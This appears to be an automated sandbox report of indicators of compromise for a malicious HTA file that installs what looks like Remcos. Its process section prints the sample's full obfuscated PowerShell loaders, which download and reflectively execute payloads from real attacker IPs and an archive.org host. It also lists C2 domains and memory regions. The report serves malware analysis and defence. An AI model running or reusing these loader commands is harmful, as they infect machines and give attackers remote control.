IOC Report
LJ1IZDkHyE.hta

loading gif

Files

File Path
Type
Category
Malicious
LJ1IZDkHyE.hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nicemeetingsofpictureclearthingstobe[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RES9FA0.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Sep 25 18:26:38 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3avg21oj.lby.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avhm3mxt.kyo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwcckyoy.geo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jglgku3t.ix2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jshrsksj.riy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2e2crop.3g1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooaobhj5.cfc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qu2krlml.ehe.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.out
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
modified
There are 9 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIF
104.168.32.148
malicious
http://104.168.32.148/345/CHPPZA.txt
104.168.32.148
malicious
ramcxx.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://104.168.32.148/345/niceme
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://ia600100.us.archivL
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://www.microsoft.
unknown
http://104.168.32.148
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
unknown
http://104.168.32.148/
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
207.241.227.240
http://crl.micro
unknown
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pscore6lB
unknown
http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFL
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://ia600100.us.archive.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://ia600100.us.archive.org
unknown
There are 20 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ramcxx.duckdns.org
45.134.140.70
malicious
ia600100.us.archive.org
207.241.227.240

IPs

IP
Domain
Country
Malicious
104.168.32.148
unknown
United States
malicious
45.134.140.70
ramcxx.duckdns.org
Georgia
malicious
207.241.227.240
ia600100.us.archive.org
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-M3P7YT
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-M3P7YT
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-M3P7YT
time
There are 11 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
60CF000
trusted library allocation
page read and write
malicious
5F8B000
trusted library allocation
page read and write
malicious
DBB000
heap
page read and write
malicious
8730000
trusted library section
page read and write
malicious
28DE000
stack
page read and write
malicious
6395000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
5489000
heap
page read and write
794B000
heap
page read and write
4C60000
trusted library allocation
page read and write
523F000
trusted library allocation
page read and write
F5C000
stack
page read and write
5FD2000
heap
page read and write
6599000
heap
page read and write
53AF000
trusted library allocation
page read and write
78DE000
stack
page read and write
54DE000
heap
page read and write
2DE3000
heap
page read and write
4BD7000
heap
page read and write
3520000
trusted library allocation
page read and write
7C0000
heap
page read and write
E60000
heap
page read and write
76CE000
stack
page read and write
5493000
heap
page read and write
37A0000
heap
page read and write
4FE0000
heap
page read and write
5FC2000
heap
page read and write
593F000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
2B1D000
stack
page read and write
7A40000
trusted library allocation
page read and write
745E000
stack
page read and write
72CD000
stack
page read and write
7A01000
heap
page read and write
8760000
trusted library allocation
page read and write
722F000
stack
page read and write
519A000
trusted library allocation
page read and write
728B000
stack
page read and write
602C000
trusted library allocation
page read and write
5060000
heap
page read and write
3500000
trusted library allocation
page read and write
54EE000
heap
page read and write
7DBD000
stack
page read and write
749F000
stack
page read and write
508F000
heap
page read and write
65C4000
heap
page read and write
549E000
stack
page read and write
FAE000
stack
page read and write
798D000
heap
page read and write
2B73000
heap
page read and write
6001000
heap
page read and write
8960000
trusted library allocation
page execute and read and write
34F3000
trusted library allocation
page execute and read and write
9195000
trusted library allocation
page read and write
51E0000
heap
page read and write
5FC2000
heap
page read and write
504E000
stack
page read and write
6210000
trusted library allocation
page read and write
7127000
trusted library allocation
page read and write
65B3000
heap
page read and write
5F99000
heap
page read and write
7980000
trusted library allocation
page read and write
6001000
heap
page read and write
4F83000
trusted library allocation
page read and write
5468000
heap
page read and write
65B3000
heap
page read and write
65F6000
heap
page read and write
5FC2000
heap
page read and write
759A000
stack
page read and write
531F000
trusted library allocation
page read and write
6585000
heap
page read and write
65C4000
heap
page read and write
5260000
heap
page read and write
658F000
heap
page read and write
547E000
heap
page read and write
600D000
heap
page read and write
65D1000
heap
page read and write
2B40000
heap
page read and write
6001000
heap
page read and write
549F000
heap
page read and write
5083000
heap
page read and write
31CE000
stack
page read and write
506C000
heap
page read and write
4F15000
heap
page read and write
8A40000
heap
page read and write
2E13000
heap
page read and write
5F99000
heap
page read and write
693E000
stack
page read and write
347E000
stack
page read and write
717E000
stack
page read and write
65DF000
heap
page read and write
5F2D000
heap
page read and write
5208000
trusted library allocation
page read and write
5452000
trusted library allocation
page read and write
2C39000
heap
page read and write
509C000
heap
page read and write
653B000
heap
page read and write
5189000
trusted library allocation
page read and write
5508000
trusted library allocation
page read and write
F42000
heap
page read and write
33C0000
heap
page read and write
6001000
heap
page read and write
3522000
trusted library allocation
page read and write
5FC3000
heap
page read and write
2BC3000
heap
page read and write
2900000
heap
page read and write
2E1D000
heap
page read and write
50D6000
heap
page read and write
2D0C000
heap
page read and write
726E000
stack
page read and write
50CA000
heap
page read and write
65EA000
heap
page read and write
50D9000
heap
page read and write
5FE2000
heap
page read and write
E8D000
heap
page read and write
4C92000
trusted library allocation
page read and write
65EC000
heap
page read and write
7D40000
trusted library allocation
page read and write
36E0000
trusted library allocation
page read and write
71AE000
stack
page read and write
2BA5000
heap
page read and write
5178000
trusted library allocation
page read and write
73FE000
stack
page read and write
5100000
heap
page read and write
54BF000
heap
page read and write
31D0000
heap
page read and write
65E6000
heap
page read and write
6599000
heap
page read and write
7991000
heap
page read and write
7080000
heap
page execute and read and write
2D08000
heap
page read and write
5088000
heap
page read and write
4D00000
heap
page read and write
4AF0000
trusted library allocation
page read and write
30DD000
heap
page read and write
65B3000
heap
page read and write
501B000
heap
page read and write
7C2E000
stack
page read and write
75DE000
stack
page read and write
5F2F000
heap
page read and write
3170000
trusted library allocation
page read and write
F98000
stack
page read and write
2BCC000
heap
page read and write
54E4000
heap
page read and write
5063000
heap
page read and write
6599000
heap
page read and write
5214000
heap
page read and write
653D000
heap
page read and write
6578000
heap
page read and write
2B7A000
heap
page read and write
65BC000
heap
page read and write
34F0000
trusted library allocation
page read and write
7C21000
heap
page read and write
653B000
heap
page read and write
575E000
stack
page read and write
7580000
heap
page read and write
850E000
stack
page read and write
2BC3000
heap
page read and write
2D90000
heap
page read and write
4D40000
heap
page readonly
5F93000
heap
page read and write
2C37000
heap
page read and write
65F6000
heap
page read and write
65D8000
heap
page read and write
52AE000
trusted library allocation
page read and write
65D6000
heap
page read and write
788E000
stack
page read and write
2BA5000
heap
page read and write
3187000
heap
page read and write
4BAE000
stack
page read and write
2B2E000
stack
page read and write
3184000
trusted library allocation
page read and write
2D9B000
heap
page read and write
64C9000
heap
page read and write
2D23000
heap
page read and write
4B4E000
stack
page read and write
506D000
heap
page read and write
4FE1000
heap
page read and write
600D000
heap
page read and write
771B000
stack
page read and write
2D00000
heap
page read and write
2B50000
heap
page read and write
2C32000
heap
page read and write
259A000
stack
page read and write
3750000
trusted library allocation
page read and write
31D6000
heap
page read and write
5FB0000
heap
page read and write
2DF5000
heap
page read and write
6622000
heap
page read and write
AFC000
stack
page read and write
5ABE000
stack
page read and write
6217000
trusted library allocation
page read and write
89D0000
trusted library allocation
page read and write
653B000
heap
page read and write
78F0000
heap
page read and write
65B6000
heap
page read and write
7BBF000
heap
page read and write
50E2000
heap
page read and write
75C0000
heap
page read and write
501D000
heap
page read and write
799F000
heap
page read and write
2DFD000
heap
page read and write
2C7D000
stack
page read and write
79E0000
trusted library allocation
page read and write
373C000
stack
page read and write
31E0000
heap
page read and write
16DE000
stack
page read and write
2C34000
heap
page read and write
4E30000
heap
page read and write
102C000
stack
page read and write
8C50000
trusted library allocation
page execute and read and write
2DFA000
heap
page read and write
65B6000
heap
page read and write
7A20000
trusted library allocation
page read and write
6599000
heap
page read and write
549A000
heap
page read and write
5CFD000
stack
page read and write
710B000
stack
page read and write
5167000
heap
page read and write
8520000
trusted library allocation
page execute and read and write
7120000
direct allocation
page read and write
76D1000
heap
page read and write
35B5000
heap
page read and write
4F10000
heap
page read and write
5196000
trusted library allocation
page read and write
6002000
heap
page read and write
6001000
heap
page read and write
5F93000
heap
page read and write
343E000
stack
page read and write
65D2000
heap
page read and write
7C6D000
stack
page read and write
54ED000
heap
page read and write
2DF9000
heap
page read and write
65B6000
heap
page read and write
3525000
trusted library allocation
page execute and read and write
581E000
stack
page read and write
6A3F000
stack
page read and write
6451000
trusted library allocation
page read and write
28F7000
stack
page read and write
2D7A000
heap
page read and write
7E80000
trusted library allocation
page read and write
7085000
heap
page execute and read and write
65F9000
heap
page read and write
7D00000
trusted library allocation
page read and write
5F93000
heap
page read and write
4A6F000
heap
page read and write
2C3E000
heap
page read and write
79C0000
trusted library allocation
page read and write
2B72000
heap
page read and write
2C1F000
stack
page read and write
5940000
heap
page read and write
6565000
heap
page read and write
50C2000
heap
page read and write
51EB000
heap
page read and write
6006000
heap
page read and write
6005000
heap
page read and write
EDF000
heap
page read and write
76A5000
heap
page read and write
65DD000
heap
page read and write
6531000
heap
page read and write
6470000
trusted library allocation
page read and write
89C0000
trusted library allocation
page read and write
65EA000
heap
page read and write
2D0E000
heap
page read and write
4F5E000
stack
page read and write
65BC000
heap
page read and write
658D000
heap
page read and write
312E000
stack
page read and write
5061000
heap
page read and write
51FD000
heap
page read and write
65DF000
heap
page read and write
65F9000
heap
page read and write
7300000
direct allocation
page read and write
56DE000
stack
page read and write
897E000
stack
page read and write
5F20000
heap
page read and write
6596000
heap
page read and write
6001000
heap
page read and write
765E000
stack
page read and write
54EE000
heap
page read and write
13E8000
heap
page read and write
34F4000
trusted library allocation
page read and write
6533000
heap
page read and write
8DE0000
trusted library allocation
page read and write
657C000
heap
page read and write
65E7000
heap
page read and write
C0E000
stack
page read and write
6005000
heap
page read and write
6003000
heap
page read and write
5F21000
heap
page read and write
5075000
heap
page read and write
2C2D000
heap
page read and write
6004000
heap
page read and write
2DF0000
heap
page read and write
2E00000
heap
page read and write
2DF9000
heap
page read and write
4C97000
trusted library allocation
page execute and read and write
65AF000
heap
page read and write
8FBE000
stack
page read and write
65CB000
heap
page read and write
65D6000
heap
page read and write
6214000
trusted library allocation
page read and write
5FD2000
heap
page read and write
7D30000
trusted library allocation
page read and write
716C000
stack
page read and write
2BC3000
heap
page read and write
65BC000
heap
page read and write
3615000
heap
page read and write
8E2E000
stack
page read and write
65D4000
heap
page read and write
71EE000
stack
page read and write
50DD000
heap
page read and write
54EE000
heap
page read and write
2D8F000
heap
page read and write
65CB000
heap
page read and write
2BAD000
heap
page read and write
75DE000
stack
page read and write
7B20000
heap
page execute and read and write
6579000
heap
page read and write
8977000
trusted library allocation
page read and write
788F000
stack
page read and write
872E000
stack
page read and write
4F5E000
stack
page read and write
5F99000
heap
page read and write
5F88000
heap
page read and write
656C000
heap
page read and write
7C32000
heap
page read and write
5202000
trusted library allocation
page read and write
72AE000
stack
page read and write
50E0000
heap
page execute and read and write
6564000
heap
page read and write
5451000
trusted library allocation
page read and write
571E000
stack
page read and write
2B72000
heap
page read and write
79A0000
trusted library allocation
page read and write
51E0000
heap
page read and write
7998000
heap
page read and write
501D000
heap
page read and write
8740000
trusted library allocation
page execute and read and write
4C6D000
trusted library allocation
page execute and read and write
6BDC000
stack
page read and write
6F5E000
stack
page read and write
3509000
trusted library allocation
page read and write
5F2F000
heap
page read and write
65CB000
heap
page read and write
5F87000
heap
page read and write
65DF000
heap
page read and write
2C07000
heap
page read and write
54D6000
heap
page read and write
79A4000
heap
page read and write
36D0000
heap
page readonly
50A5000
heap
page read and write
50DA000
heap
page read and write
50BD000
heap
page read and write
65A0000
heap
page read and write
34FD000
trusted library allocation
page execute and read and write
5F89000
heap
page read and write
9100000
trusted library allocation
page read and write
51F5000
trusted library allocation
page read and write
658E000
heap
page read and write
2D00000
trusted library allocation
page read and write
890D000
stack
page read and write
54EA000
heap
page read and write
85D0000
direct allocation
page read and write
2D28000
heap
page read and write
4CFE000
stack
page read and write
4EF0000
heap
page read and write
7132000
direct allocation
page read and write
65B6000
heap
page read and write
2C65000
heap
page read and write
2CBE000
stack
page read and write
93AC000
stack
page read and write
5FC2000
heap
page read and write
775D000
stack
page read and write
3190000
trusted library allocation
page read and write
65C4000
heap
page read and write
8DD0000
trusted library allocation
page read and write
2CAE000
stack
page read and write
31B5000
trusted library allocation
page execute and read and write
2DEA000
heap
page read and write
6159000
trusted library allocation
page read and write
673A000
trusted library allocation
page read and write
751A000
stack
page read and write
50B5000
heap
page read and write
5013000
heap
page read and write
5075000
heap
page read and write
759B000
stack
page read and write
4DDE000
stack
page read and write
65D1000
heap
page read and write
3602000
heap
page read and write
65B3000
heap
page read and write
F20000
heap
page read and write
8ACD000
heap
page read and write
531B000
trusted library allocation
page read and write
6567000
heap
page read and write
54EC000
heap
page read and write
5198000
trusted library allocation
page read and write
769A000
stack
page read and write
2C3D000
heap
page read and write
730B000
stack
page read and write
8B49000
heap
page read and write
31D0000
heap
page read and write
C8E000
stack
page read and write
65F9000
heap
page read and write
51FD000
trusted library allocation
page read and write
29DF000
stack
page read and write
7D7E000
stack
page read and write
2BBA000
heap
page read and write
4B60000
heap
page read and write
8970000
trusted library allocation
page read and write
7130000
trusted library allocation
page execute and read and write
4C64000
trusted library allocation
page read and write
50D1000
heap
page read and write
517F000
trusted library allocation
page read and write
65C7000
heap
page read and write
8440000
trusted library allocation
page read and write
EFE000
stack
page read and write
3390000
